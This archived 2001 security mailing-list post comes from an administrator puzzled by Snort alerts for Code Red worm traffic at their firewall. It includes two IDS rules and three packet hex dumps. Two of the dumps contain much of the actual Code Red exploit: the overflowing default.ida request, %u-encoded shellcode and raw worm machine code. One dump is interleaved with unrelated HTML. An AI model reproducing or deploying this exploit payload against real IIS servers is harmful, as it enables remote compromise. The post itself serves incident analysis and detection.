|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Nuno Fernandes (nfernandes
real-secure.com)Date: Wed Aug 01 2001 - 20:33:52 CDT
Hi,
Our snort IDS has been picking up odd traffic from our global IP address
of the firewall. 199.105.208.201 is our NAT IP and snort is picking up
systems from our inside network sending code red worm traffic out. The real
strange this is that we checked the systems and they are Windows NT
workstations with no IIS on them. I'm sure the rules are right since all I
did was change the msg and the port to EXTERNAL. I pasted what we got and
wondering if anyone else seen this. Also here are my rules.
alert TCP $INTERNAL any <> $EXTERNAL 80 (msg: "IDS552 IIS ISAPI Overflow ida
Outbound"; dsize: >239; flags: A+; uricontent: ".idq?"; classtype:
system-or-info-attempt; reference: arachnids,552;)
alert TCP $INTERNAL <> $EXTERNAL 80 (msg: "IDS552 IIS ISAPI Overflow ida
Outbound"; dsize: >239; flags: A+; uricontent: ".ida?"; classtype:
system-or-info-attempt; reference: arachnids,552;)
----------------------------------------------------------------------------
--
#(2 - 60843) [2001-08-01 13:25:23] [arachNIDS/552] IDS552 IIS ISAPI
Overflow ida Outbound
IPv4: 207.251.72.172 -> 199.105.208.201
hlen=5 TOS=16 dlen=332 ID=0 flags=0 offset=0 TTL=240 chksum=0
TCP: port=80 -> dport: 46247 flags=***AP*** seq=1013502254
ack=831497185 off=5 res=0 win=7988 urp=0 chksum=0
Payload: length = 292
000 : 53 C2 BC 00 2F 64 65 66 61 75 6C 74 2E 69 64 61 S.../default.ida
010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E ?NNNNNNNNNNNNNNN
020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0f0 : 4E 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30 N.090.858.bd3.80
100 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30 1.090.858.bd3.80
110 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30 1.090.858.bd3.80
120 : 31 00 30 39 1.09
----------------------------------------------------------------------------
--
#(2 - 60997) [2001-08-01 14:46:32] [arachNIDS/552] IDS552 IIS ISAPI
Overflow ida Outbound
IPv4: 209.67.183.22 -> 199.105.208.201
hlen=5 TOS=16 dlen=1547 ID=0 flags=0 offset=0 TTL=240 chksum=0
TCP: port=80 -> dport: 57948 flags=***AP*** seq=583521197
ack=3604700076 off=5 res=0 win=8280 urp=0 chksum=0
Payload: length = 1507
000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida
010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E ?NNNNNNNNNNNNNNN
020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0f0 : 4E 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 N%u9090%u6858%uc
100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090%
110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780
120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc
130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090%
140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c
150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5
160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078%
170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT
180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t
190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F ype: text/xml.HO
1a0 : 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A ST:www.worm.com.
1b0 : 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E Accept: */*.Con
1c0 : 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36 tent-length: 356
1d0 : 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53 9 ....U........S
1e0 : 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC VW..............
1f0 : CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A ......p.........
200 : 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64 .....h.........d
210 : A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9 ......G.d.=.....
220 : 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF o.....`.........
230 : FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4 ......h.........
240 : FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A .....X......w...
250 : 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B ....p...........
260 : 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF .X...........X..
270 : FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58 ...X......xu...X
280 : FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66 .........X...3.f
290 : 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58 ..=MZ..........X
2a0 : FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B ....Q<..X...3.f.
2b0 : 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95 ....PE....y.....
2c0 : 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01 X....B<..X....T.
2d0 : 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54 x..X.....T.....T
2e0 : FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D 4C FE ....H...X.....L.
2f0 : FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E 0F 85 ....L....:KERN..
300 : 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 4C 33 3.....L....x.EL3
310 : 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D 34 2.. .....X.....4
320 : FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03 .....T.....X....
330 : 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00 B ..L.....H.....
340 : 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48 ......H........H
350 : FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE .....L........L.
360 : FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48 ....T.....H...;H
370 : 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B 02 8B .........L......
380 : 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 A0 00 .X....<.GetP....
390 : 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF ....L.......X...
3a0 : 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 8B 95 .|..rocA........
3b0 : 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE FF FF H.....H.....X...
3c0 : 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 0A 89 ..T....H$3.f....
3d0 : 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 8B 85 .L.....T....Q...
3e0 : 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF 8B 95 L....L....L.....
3f0 : 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE FF FF L.....L.....L...
400 : 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 54 FE ..L.....X.....T.
410 : FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF 8B 85 ...H......L.....
420 : 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF FF L.....X.....p...
430 : EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE ................
440 : FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF ...G.d.......p..
450 : FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01 ..u..8.....L....
460 : 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D .......L........
470 : 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F L.....h.........
480 : 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 83 FA .......h........
490 : 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 50 FF .u!..h........P.
4a0 : 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 34 FE .....;..CKCK..4.
4b0 : FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 95 34 ...*....h...Q..4
4c0 : FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 4B 43 ...R..p...;..CKC
4d0 : 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF EB 0F K..L............
4e0 : 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF 8B ..h........h....
4f0 : 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 8B 95 .h........t.....
500 : 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 53 FF h........h....S.
510 : FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 FE FF ....h........h..
520 : FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE FF FF ..M.........l...
530 : C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE FF FF ..L.............
540 : 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE FF FF h.E.............
550 : 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90 8B 4D [SS.......cx...M
560 : 08 8B 51 10 5F 6F 77 6E 65 72 73 22 20 74 61 72 ..Q._owners"
tar
570 : 67 65 74 3D 22 5F 74 6F 70 22 20 63 6F 6F 72 64 get="_top"
coord
580 : 73 3D 22 30 2C 30 2C 20 39 36 2C 31 30 22 20 6F s="0,0,
96,10" o
590 : 6E 4D 6F 75 73 65 4F 76 65 72 3D 22 6C 69 28 27
nMouseOver="li('
5a0 : 72 27 2C 20 27 2F 61 72 72 6F 77 5F 6F 6E 2E 67 r', '/arrow_on.g
5b0 : 69 66 27 29 3B 72 65 74 75 72 6E 20 74 72 75 65 if');return true
5c0 : 3B 22 20 6F 6E 4D 6F 75 73 65 4F 75 74 3D 22 6C ;"
onMouseOut="l
5d0 : 69 28 27 72 27 2C 20 27 2F 61 72 72 6F 77 5F 6F i('r', '/arrow_o
5e0 : 66 66 2E ff.
----------------------------------------------------------------------------
--
#(2 - 60996) [2001-08-01 14:46:32] [arachNIDS/552] IDS552 IIS ISAPI
Overflow ida Outbound
IPv4: 209.67.183.22 -> 199.105.208.201
hlen=5 TOS=16 dlen=1420 ID=0 flags=0 offset=0 TTL=240 chksum=0
TCP: port=80 -> dport: 57948 flags=***AP*** seq=583521197
ack=3604698569 off=5 res=0 win=8280 urp=0 chksum=0
Payload: length = 1380
000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida
010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E ?NNNNNNNNNNNNNNN
020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN
0f0 : 4E 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 N%u9090%u6858%uc
100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090%
110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780
120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc
130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090%
140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c
150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5
160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078%
170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT
180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t
190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F ype: text/xml.HO
1a0 : 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A ST:www.worm.com.
1b0 : 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E Accept: */*.Con
1c0 : 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36 tent-length: 356
1d0 : 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53 9 ....U........S
1e0 : 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC VW..............
1f0 : CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A ......p.........
200 : 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64 .....h.........d
210 : A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9 ......G.d.=.....
220 : 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF o.....`.........
230 : FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4 ......h.........
240 : FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A .....X......w...
250 : 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B ....p...........
260 : 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF .X...........X..
270 : FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58 ...X......xu...X
280 : FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66 .........X...3.f
290 : 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58 ..=MZ..........X
2a0 : FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B ....Q<..X...3.f.
2b0 : 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95 ....PE....y.....
2c0 : 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01 X....B<..X....T.
2d0 : 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54 x..X.....T.....T
2e0 : FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D 4C FE ....H...X.....L.
2f0 : FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E 0F 85 ....L....:KERN..
300 : 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 4C 33 3.....L....x.EL3
310 : 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D 34 2.. .....X.....4
320 : FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03 .....T.....X....
330 : 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00 B ..L.....H.....
340 : 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48 ......H........H
350 : FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE .....L........L.
360 : FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48 ....T.....H...;H
370 : 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B 02 8B .........L......
380 : 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 A0 00 .X....<.GetP....
390 : 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF ....L.......X...
3a0 : 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 8B 95 .|..rocA........
3b0 : 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE FF FF H.....H.....X...
3c0 : 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 0A 89 ..T....H$3.f....
3d0 : 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 8B 85 .L.....T....Q...
3e0 : 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF 8B 95 L....L....L.....
3f0 : 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE FF FF L.....L.....L...
400 : 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 54 FE ..L.....X.....T.
410 : FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF 8B 85 ...H......L.....
420 : 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF FF L.....X.....p...
430 : EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE ................
440 : FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF ...G.d.......p..
450 : FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01 ..u..8.....L....
460 : 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D .......L........
470 : 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F L.....h.........
480 : 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 83 FA .......h........
490 : 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 50 FF .u!..h........P.
4a0 : 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 34 FE .....;..CKCK..4.
4b0 : FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 95 34 ...*....h...Q..4
4c0 : FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 4B 43 ...R..p...;..CKC
4d0 : 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF EB 0F K..L............
4e0 : 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF 8B ..h........h....
4f0 : 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 8B 95 .h........t.....
500 : 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 53 FF h........h....S.
510 : FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 FE FF ....h........h..
520 : FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE FF FF ..M.........l...
530 : C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE FF FF ..L.............
540 : 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE FF FF h.E.............
550 : 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90 8B 4D [SS.......cx...M
560 : 08 8B 51 10 ..Q.
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]